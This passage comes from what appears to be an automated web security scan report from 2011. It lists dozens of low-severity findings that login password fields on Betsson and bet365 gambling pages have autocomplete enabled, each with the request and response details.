Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.11. https://games.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://games.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://games.betsson.com/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/ HTTP/1.1
Host: games.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:34:48 GMT
Connection: close
Content-Length: 161353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.12. https://livecasino.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://livecasino.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://livecasino.betsson.com/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/ HTTP/1.1
Host: livecasino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.13. http://poker.bet365.com/home/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://poker.bet365.com
Path:	/home/en/

Issue detail

The page contains a form with the following action URL:

http://poker.bet365.com/home/en/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.14. https://poker.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://poker.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://poker.betsson.com/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/ HTTP/1.1
Host: poker.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:27 GMT
Connection: close
Content-Length: 39393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.15. https://scratch.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/?navbar=true

The form contains the following password field with autocomplete enabled:

tbPassword

Request

Response

13.16. https://scratch.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/ HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.17. https://scratch.betsson.com/en/Casino previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.18. https://scratch.betsson.com/en/Casino/Bingo-Bonanza previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Bingo-Bonanza

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Bingo-Bonanza

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Bingo-Bonanza HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.19. https://scratch.betsson.com/en/Casino/Bubble-Bingo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Bubble-Bingo

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Bubble-Bingo

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Bubble-Bingo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.20. https://scratch.betsson.com/en/Casino/Disco-Keno previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Disco-Keno

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Disco-Keno

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Disco-Keno HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.21. https://scratch.betsson.com/en/Casino/HiLo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/HiLo

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/HiLo

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/HiLo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.22. https://scratch.betsson.com/en/Casino/Lucky-21 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Lucky-21

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Lucky-21

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Lucky-21 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.23. https://scratch.betsson.com/en/Casino/Namaste previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Namaste

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Namaste

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Namaste HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.24. https://scratch.betsson.com/en/Casino/Poker-King previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Poker-King

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Poker-King

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Poker-King HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.25. https://scratch.betsson.com/en/Casino/Roulette previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Roulette

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Roulette

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Roulette HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.26. https://scratch.betsson.com/en/Casino/Royal-Slots previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Royal-Slots

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Royal-Slots

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Royal-Slots HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.27. https://scratch.betsson.com/en/Casino/Slot-Super-7 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Slot-Super-7

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Casino/Slot-Super-7

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Casino/Slot-Super-7 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.28. https://scratch.betsson.com/en/Classic previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.29. https://scratch.betsson.com/en/Classic/3-Wow previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/3-Wow

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/3-Wow

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/3-Wow HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.30. https://scratch.betsson.com/en/Classic/7th-Heaven previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/7th-Heaven

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/7th-Heaven

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/7th-Heaven HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.31. https://scratch.betsson.com/en/Classic/Champagne previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Champagne

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Champagne

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Champagne HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.32. https://scratch.betsson.com/en/Classic/Golden-Fortune previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Golden-Fortune

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Golden-Fortune

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Golden-Fortune HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.33. https://scratch.betsson.com/en/Classic/Happy-Birthday previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Happy-Birthday

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Happy-Birthday

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Happy-Birthday HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.34. https://scratch.betsson.com/en/Classic/Jungle-Joy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Jungle-Joy

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Jungle-Joy

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Jungle-Joy HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.35. https://scratch.betsson.com/en/Classic/Neighbors previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Neighbors

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Neighbors

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Neighbors HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.36. https://scratch.betsson.com/en/Classic/Spy-Comics previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Spy-Comics

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Spy-Comics

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Spy-Comics HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.37. https://scratch.betsson.com/en/Classic/Super-3-Wow previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Super-3-Wow

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Super-3-Wow

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Super-3-Wow HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.38. https://scratch.betsson.com/en/Classic/Tiger-Mahjong previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Tiger-Mahjong

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Tiger-Mahjong

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Tiger-Mahjong HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.39. https://scratch.betsson.com/en/Classic/Wild-West previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Wild-West

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/Wild-West

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/Wild-West HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.40. https://scratch.betsson.com/en/Classic/XO previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/XO

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Classic/XO

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Classic/XO HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.41. https://scratch.betsson.com/en/Default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Default.aspx

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Default.aspx

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Default.aspx HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.42. https://scratch.betsson.com/en/FAQ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/FAQ

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/FAQ

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/FAQ HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.43. https://scratch.betsson.com/en/Fantasy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.44. https://scratch.betsson.com/en/Fantasy/Cash-Farm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Cash-Farm

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Cash-Farm

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Cash-Farm HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.45. https://scratch.betsson.com/en/Fantasy/Club-Pearl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Club-Pearl

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Club-Pearl

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Club-Pearl HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.46. https://scratch.betsson.com/en/Fantasy/Crazy-Cat previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Crazy-Cat

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Crazy-Cat

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Crazy-Cat HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.47. https://scratch.betsson.com/en/Fantasy/Dancing-Domino previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Dancing-Domino

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Dancing-Domino

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Dancing-Domino HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.48. https://scratch.betsson.com/en/Fantasy/Fast-Hands previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Fast-Hands

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Fast-Hands

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Fast-Hands HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.49. https://scratch.betsson.com/en/Fantasy/Golden-Island previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Golden-Island

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Golden-Island

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Golden-Island HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.50. https://scratch.betsson.com/en/Fantasy/Knights-Battle previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Knights-Battle

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Knights-Battle

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Knights-Battle HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.51. https://scratch.betsson.com/en/Fantasy/Love-Birds previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Love-Birds

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Love-Birds

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Love-Birds HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.52. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Lucky-Diamonds

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Lucky-Diamonds HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.53. https://scratch.betsson.com/en/Fantasy/Master-Mix previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Master-Mix

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Master-Mix

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Master-Mix HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

13.54. https://scratch.betsson.com/en/Fantasy/Memory-Madness previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Memory-Madness

Issue detail

The page contains a form with the following action URL:

https://scratch.betsson.com/en/Fantasy/Memory-Madness

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/Fantasy/Memory-Madness HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

